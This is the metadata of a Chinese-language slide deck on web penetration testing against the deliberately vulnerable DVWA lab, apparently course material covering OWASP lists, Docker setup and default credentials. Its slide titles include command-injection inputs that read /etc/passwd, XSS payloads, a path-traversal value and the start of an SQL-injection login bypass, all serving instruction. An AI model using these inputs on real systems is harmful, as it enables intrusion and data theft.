      <vt:lpstr>roboto</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Rockwell Condensed</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>木刻字型</vt:lpstr>
      <vt:lpstr>網站滲透測試實務 DVWA測試案例</vt:lpstr>
      <vt:lpstr>agenda</vt:lpstr>
      <vt:lpstr>網站安全 WeB Security</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Web Application Security Risks(2021)</vt:lpstr>
      <vt:lpstr>OWASP Top 10 API Security Risks 2023</vt:lpstr>
      <vt:lpstr>網站安全測試   OWASP Web Security Testing Guide</vt:lpstr>
      <vt:lpstr>網站安全驗證(OWASP Application Security Verification Standard (ASVS))</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>https://hub.docker.com/r/webgoat/webgoat-8.0/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輸入</vt:lpstr>
      <vt:lpstr>Shift-F5 ==&gt; 開啟開發者工具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在Kali Linux 安裝Docker</vt:lpstr>
      <vt:lpstr>啟動docker</vt:lpstr>
      <vt:lpstr>更多docker指令請參閱  https://philipzheng.gitbooks.io/docker_practice/content/</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Google搜尋dvwa docker</vt:lpstr>
      <vt:lpstr>下載image:: docker pull XXXXX/YYYY</vt:lpstr>
      <vt:lpstr>啟動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要先設定資料庫</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>預設帳密: Username: admin Password: password</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>四種安全等級</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>正常輸入::216.58.200.36</vt:lpstr>
      <vt:lpstr>測試型輸入::216.58.200.36;ls</vt:lpstr>
      <vt:lpstr>測試型輸入::216.58.200.36; cd .. &amp;&amp; cd ..&amp;&amp; cat /etc/passwd</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>正常輸入</vt:lpstr>
      <vt:lpstr>測試輸入</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>正常輸入</vt:lpstr>
      <vt:lpstr>簡單的XSS payload</vt:lpstr>
      <vt:lpstr>測試型輸入::輸入XSS payload</vt:lpstr>
      <vt:lpstr>練習使用底下技術測試看看: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>&lt; “&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt; &lt;body onLoad=”while(true) alert(‘XSS’);”&gt; ‘”&gt;&lt;/title&gt;</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>測試型輸入</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>點選看看網址欄會有甚麼變化</vt:lpstr>
      <vt:lpstr>page=../../../../../../etc/passwd</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Brute Force</vt:lpstr>
      <vt:lpstr>不必暴力破解也行::admin' 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網站滲透測試實務 DVWA測試案例</dc:title>
  <dc:creator>user</dc:creator>
  <cp:lastModifiedBy>KSU</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-17T06:23:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-18T02:01:14Z</dcterms:modified>
</cp:coreProperties>
</file>